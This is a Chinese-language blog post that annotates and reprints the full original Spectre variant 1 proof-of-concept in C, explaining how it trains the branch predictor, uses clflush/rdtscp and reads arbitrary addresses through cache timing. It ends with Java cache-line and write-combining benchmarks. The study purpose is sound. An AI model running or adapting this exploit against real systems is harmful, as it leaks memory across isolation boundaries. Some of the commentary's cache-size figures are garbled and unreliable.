intel：spectre&Meltdown侧信道攻击（二）—— cache line缓存作祟

　　上面一篇介绍了spectre&meltdown基本原理和简单的demo方案，今天继续学习一下该漏洞发现团队原始的POC：https://spectreattack.com/spectre.pdf

　　1、先展示一下运行结果，便于有个直观的认识：从打印的结果来看，成功猜测出了secret字符串的内容；

　　2、下面详细解读代码

（1）整个漏洞利用核心的两个函数：rdtscp和clflush都在这两个头文件里申明了；

#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

　　（2）array1：attacker用来访问victim的数组。这里申明了160字节，但后续会用很大的数跨越数组定义时的边界限制，达到访问victim内存的目的；

unuesed1和unused2：多核cpu，每个核都有各自的L1和L2缓存；缓存以line作为基本的单元，每个cache line有64字节；unuesed1和unuesed2刚好填满2个cache line，array1占用3个cache line；

这3个数组一共占用5个不同的cache line；

　　　　 array2：secret每个单位是1byte，大小不超过255，所以“横坐标”最大256；每个cache line是64byte(最小缓存单元)，也就是512bit，所以“纵坐标”是512；

uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array2[256 * 512];//（1）secret每个单位1字节，数字大小不超过255；（2）L1的单个cache line大小64K = 512bit,这里可存储256个不同的cache line （3）shared with the attacker and victim

　　（3）这个是victim的数据，也就是需要爆破的数据；

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

　　（4）通过array1申明的长度是160，但后面某些时候会传入远大于160的数，越界访问secret的内容后存入缓存。后面即使if条件不成立，cpu回退寄存器的状态，但是的缓存仍然还在；

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
    if (x < array1_size)//array1_size不在缓存，需要从内存读，很耗时，cpu先行执行下面的语句
    {
        temp &= array2[array1[x] * 512];//array1长度是160，但x可以远超160，比如main里面定义malicious_x，这样就进入secret的存储空间
    }
}

　　（5）判断cache是否命中的阈值，这个值是多次实验得到的，不是理论推导出来的；

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是多次实验测试得到的，不是某些理论推导出来的 */

　　（6）保存缓存是否命中结果

for (i = 0; i < 256; i++)
        results[i] = 0;

　　（7）array2每个元素如果已经在cpu的缓存，全部清除，避免影响后续计时；

for (i = 0; i < 256; i++)//每个元素的缓存都清零
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

　　（8）把array1_size从cpu缓存去除；紧接着的这个空转为了确保array1_size的从cpu缓存清除；

 _mm_clflush(&array1_size);//array1_size从缓存去除
 for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it；volatile强制cpu从内存读取Z的值，否则这个空转可能被编译器优化
 {/* Delay (can also mfence),也可以用 mfence 替代*/
 }

　　（9）这里计算array1的偏移坐标，方法很复杂，单看代码很难理解为啥这么做，不妨先打印一些结果数据看看：

x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));

　　  构造的x如下：很有规律，每6次一个轮回；每个轮回前5次的x都是7，在arry1_size的范围内，if条件是成立的；最后一个远大于arry1_size，导致if条件失效；但CPU有分支预测功能，会根据该
if分支附近或前面几个分支预测下一个if分支是否成立。前面5个分支都是成立的，会“诱导”cpu认为第6次if也成立，进而提前执行temp &= array2[array1[x] * 512]的代码，把victim的内存读到cpu
内部缓存； 然后就是执行victim_funtion（）；

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

　　（10）victim_function执行完后，重新从array2读数据，并计时；耗时最短的说明在victim中存的就是这个；

/* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
            mix_i = ((i * 167) + 13) & 255;//1、打乱读取byte的顺序，避免cpu猜测和优化byte的读取  2、&255=&FF，只保留低8bit，效果相当于%255（小于255）或%255-1（大于255）
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

　　（11）接下来就是排序，找出耗时最短的2个数字；

/* Locate highest & second-highest results results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];

　　（12）继续看main：这个就是从arry1到目标内存的offset：

size_t malicious_x = (size_t)(secret - (char*)array1);

　　　　紧接着会传入readMemoryByte函数去探测读取内容：

printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);

　　（13）和https://www.cnblogs.com/theseventhson/p/13282921.html 这个POC比，这个demo多了两个功能：

　训（诱）练（导）cpu的分支预测结果，让其认为下一个if条件是成立的，提前执行if分支
不仅仅能探测secret内容，还能让用户指定需要探测的目标地址和探测的数据长度，如下：

    if (argc == 3)//第一个参数是目标地址，第二个参数是读取的字节数；
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

完整的代码如下（精华都在注释了）：

#include <stdio.h> 
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers */
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/;
unsigned int array1_size = 16;
uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array2[256 * 512];//（1）secret每个单位1字节，数字大小不超过255；（2）L3的单个cache line大小64K = 512bit,这里可存储256个不同的cache line （3）shared with the attacker and victim

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
    if (x < array1_size)//array1_size不在缓存，需要从内存读，很耗时，cpu先行执行下面的语句
    {
        temp &= array2[array1[x] * 512];//array1长度是160，但x可以远超160，比如main里面定义malicious_x，这样就进入secret的存储空间
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是多次实验测试得到的，不是某些理论推导出来的 */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
    static int results[256];//内存单元读取的时间
    int tries, i, j, k, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t* addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--)
    {
        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)//每个元素的缓存都清零
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;//training_x = 0~15
        for (j = 29; j >= 0; j--)
        {
            _mm_clflush(&array1_size);//array1_size从缓存去除
            for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it；volatile强制cpu从内存读取Z的值，否则这个空转可能被编译器优化
            {/* Delay (can also mfence),也可以用 mfence 替代*/
            } 
            /*每循环6次，其中5次产生较小的x，让if条件成立；第6次产生超大、让if不成立的x，但由于前5次的x都成立，cpu还是会预先执行if分支。前面5次小x就是用来训练cpu分支预测的，以达到第6次“欺骗”的目的*/
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);//x是相对arry1的偏移，可以深入secret数组探查；
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
            mix_i = ((i * 167) + 13) & 255;//1、打乱读取byte的顺序，避免cpu猜测和优化byte的读取  2、&255=&FF，只保留低8bit，效果相当于%255（小于255）或%255-1（大于255）
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
}

int main(int argc, const char** argv)
{
    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));
    size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x，array1到secret的距离，包括array2[256 * 512]、unused2[64]、array1[160] */
    int score[2], len = strlen(secret);
    uint8_t value[2];

    for (size_t i = 0; i < sizeof(array2); i++)//array2[256 * 512]
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3)//第一个参数是目标地址，第二个参数是读取的字节数；
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0)
    {
        printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X='%c' score=%d)", value[1],
                (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                score[1]);
        printf("\n");
    }
#ifdef _MSC_VER
    printf("Press ENTER to exit\n");
    getchar();    /* Pause Windows console */
#endif
    return (0);
}

　　为了更直观感受cpu的cache line作用，这里有两段代码比对：两段代码结构完全相同，不同的是更新数组值得位置；第一段代码中两个线程每次更新值在同一个cache line，第二段代码刚好不在同一个cache line；在同一个cache line的值会被整体更新：线程1改写了x，会通过mesi cache一致性协议通知线程2更新缓存；同理线程2改写了y也会会通过mesi cache一致性协议通知通知线程1更新缓存；两个线程不停地通知对方更新缓存，效率就低了！反观第二段代码：两个数刚好间隔了56byte，不可能被放在同一个cache line，只能分别放在两个cache line；两个线程分别更新内存时不会通过mesi协议通知对方更新缓存，大大节约了时间！

public class T03_CacheLinePadding {

    //这两个数一共16byte，大概率在一个cache line；由于加了volatile，强制要求cpu去内存取数
    public static long[] arr = new long[2];

    public static void main(String[] args) throws Exception {
        Thread t1 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[0] = i;
            }
        });

        Thread t2 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[1] = i;
            }
        });

        final long start = System.nanoTime();
        t1.start();
        t2.start();
        t1.join();
        t2.join();
        System.out.println((System.nanoTime() - start)/100_0000);
    }
}

public class T04_CacheLinePadding {
//arr[0]和arr[8]在两个不同的cache line，速度比上面在一个cache line的快！
    public static long[] arr = new long[16];

    public static void main(String[] args) throws Exception {
        Thread t1 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[0] = i;//分别在两个不同的缓存行
            }
        });

        Thread t2 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[8] = i;//分别在两个不同的缓存行
            }
        });

        final long start = System.nanoTime();
        t1.start();
        t2.start();
        t1.join();
        t2.join();
        System.out.println((System.nanoTime() - start)/100_0000);
    }
}

　　这里有个不同层级的存储介质耗时对比，非常直观：

　　（14）除了上面的L1\L2\L3缓存，cpu内部还有更快的writeCombining缓存，速度比L1都快，只有4byte；通常是cpu筹够了4byte后就整体往外部的cache写；下面是mashibing的测试代码：

public final class WriteCombining {

    private static final int ITERATIONS = Integer.MAX_VALUE;
    private static final int ITEMS = 1 << 24;
    private static final int MASK = ITEMS - 1;

    private static final byte[] arrayA = new byte[ITEMS];
    private static final byte[] arrayB = new byte[ITEMS];
    private static final byte[] arrayC = new byte[ITEMS];
    private static final byte[] arrayD = new byte[ITEMS];
    private static final byte[] arrayE = new byte[ITEMS];
    private static final byte[] arrayF = new byte[ITEMS];

    public static void main(final String[] args) {

        for (int i = 1; i <= 3; i++) {
            System.out.println(i + " SingleLoop duration (ns) = " + runCaseOne());//13649087180
            System.out.println(i + " SplitLoop  duration (ns) = " + runCaseTwo());//6030710315
        }
    }
    /*一次性更改6个byte，但是writecombining只有4byte，所以要分两次；第一次直接筹够4byte不难，
      但是第二次筹够4byte就要等了，因为第二次还剩2byte，用b填充1byte后
      剩余的1byte只能等其他结果出来后才能写入缓存，这无疑拖慢了while循环；再具体点：
      可能A-D的writecombining已经准备好写入cache，但是E-F还要等cpu计算好其他程序计算出1个byte的结果后
      后才会一次批量写入L2缓存，所以整个while循环就被E-F执行完毕拖慢了（严格讲是被其他程序拖慢了，本程序是无法控制的）*/
    public static long runCaseOne() {
        long start = System.nanoTime();
        int i = ITERATIONS;

        while (--i != 0) {
            int slot = i & MASK;
            byte b = (byte) i;
            arrayA[slot] = b;
            arrayB[slot] = b;
            arrayC[slot] = b;
            arrayD[slot] = b;
            arrayE[slot] = b;
            arrayF[slot] = b;
        }
        return System.nanoTime() - start;
    }
    /*一次性更改3个byte，分成两次更改；只要3个byte凑齐后就更新L2缓存，
      （4byte的writecombinning只剩1byte，这里用byte b = (byte)i的b变量来填充凑齐4byte）
       比上面分两次凑齐8个byte效率高很多（第二次要等其他计算结果才能筹齐4byte，不再本程序的控制范围）； 充分利用了writeCombining技术
    * */
    public static long runCaseTwo() {
        long start = System.nanoTime();
        int i = ITERATIONS;
        while (--i != 0) {
            int slot = i & MASK;
            byte b = (byte) i;
            arrayA[slot] = b;
            arrayB[slot] = b;
            arrayC[slot] = b;
        }
        i = ITERATIONS;
        while (--i != 0) {
            int slot = i & MASK;
            byte b = (byte) i;
            arrayD[slot] = b;
            arrayE[slot] = b;
            arrayF[slot] = b;
        }
        return System.nanoTime() - start;
    }
}

参考：https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre 代码解读

https://bbs.pediy.com/thread-254288.htm https://xz.aliyun.com/t/6332 跨进程泄露敏感信息

https://bbs.pediy.com/thread-256190.htm Intel处理器L3 Cache侧信道分析研究

https://www.bilibili.com/video/BV1ve411s71j/?spm_id_from=trigger_reload 马士兵：五层实现volatile

https://www.bilibili.com/video/BV1S34y1m7sX?p=27 乱序问题

posted @ 2020-07-14 22:50 第七子007 阅读(774) 评论(0) 收藏举报

刷新页面返回顶部

第七子007

intel：spectre&Meltdown侧信道攻击（二）—— cache line缓存作祟

公告